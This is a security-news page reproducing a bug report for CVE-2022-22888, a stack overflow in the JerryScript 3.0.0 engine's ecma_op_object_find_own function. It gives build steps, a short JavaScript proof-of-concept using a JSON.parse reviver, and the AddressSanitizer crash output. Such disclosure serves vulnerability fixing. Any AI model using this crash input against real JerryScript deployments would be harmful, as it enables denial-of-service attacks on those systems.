Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-22888: Stack-overflow in ecma-objects (ecma_op_object_find_own) · Issue #4848 · jerryscript-project/jerryscript

Jerryscript 3.0.0 was discovered to contain a stack overflow via ecma_op_object_find_own in /ecma/operations/ecma-objects.c.

CVE
Open in Source
#microsoft#ubuntu#linux#js

JerryScript revision

4592143

Build platform

Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86_64)
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --profile=es2015-subset --stack-limit=20

Test case

var once = false; var m = 1;

function JSEtest(){ if(!once){ m = new Array(1, 2, 3); this[2] = m; } once = true; return this[2] = m; }

JSON.parse("[1, 2, [4, 5]]", JSEtest);

Execution steps & Output

$ ./jerryscript/build/bin/jerry poc1.js

ASAN:DEADLYSIGNAL

==5376==ERROR: AddressSanitizer: stack-overflow on address 0xff3e5ff0 (pc 0x56722cec bp 0x00000000 sp 0xff3e5ff0 T0) #0 0x56722ceb in ecma_op_object_find_own /root/jerryscript/jerry-core/ecma/operations/ecma-objects.c:490 #1 0x56a4ae1f (/root/jerryscript/build/bin/jerry+0x46fe1f)

SUMMARY: AddressSanitizer: stack-overflow /root/jerryscript/jerry-core/ecma/operations/ecma-objects.c:490 in ecma_op_object_find_own ==5376==ABORTING

Credits: Found by OWL337 team.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE